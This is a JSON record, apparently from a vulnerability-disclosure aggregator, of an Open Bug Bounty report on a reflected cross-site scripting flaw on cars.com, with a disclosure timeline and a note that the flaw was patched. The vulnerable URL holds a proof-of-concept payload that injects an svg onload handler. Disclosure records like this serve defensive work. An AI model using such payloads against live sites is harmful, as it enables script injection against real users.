{"type": "openbugbounty", "lastseen": "2017-11-24T22:04:51", "href": "https://www.openbugbounty.org/reports/161687/", "cvss": {"score": 0.0, "vector": "NONE"}, "reporter": "et", "description": "##### Vulnerable URL:\n \n \n http://www.cars.com/go/compare/trimBenefit.jsp?ids=1450657,1450078&heading;=1%22--%3E%3Csvg/onload=;prompt(/OPENBUGBOUNTY/);%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at 24.11.2017 \nLatest check for patch:| 24.11.2017 11:24 GMT \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 1613 \nVIP website status:| Yes \nCheck cars.com SSL connection:| (Grade: A-) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 25 June, 2016 18:42 GMT \nGeneric security notifications sent to website owner| 25 June, 2016 18:44 GMT \nNotification sent to subscribers (without technical details)| 25 June, 2016 22:17 GMT \nVulnerability details disclosed by researcher| 23 July, 2016 19:12 GMT \nVulnerability patched by the website owner| 24 November, 2017 11:24 GMT\n", "bulletinFamily": "bugbounty", "references": [], "viewCount": 1, "cvelist": [], "openbugbounty": {"mirror": "", "patchStatus": "patched"}, "enchantments_done": [], "title": "cars.com XSS vulnerability ", "id": "OBB:161687", "modified": "2017-11-24T11:24:00", "published": "2016-06-25T18:42:00", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-24T22:04:51", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-24T22:04:51", "rev": 2}, "vulnersScore": 0.0}}

{}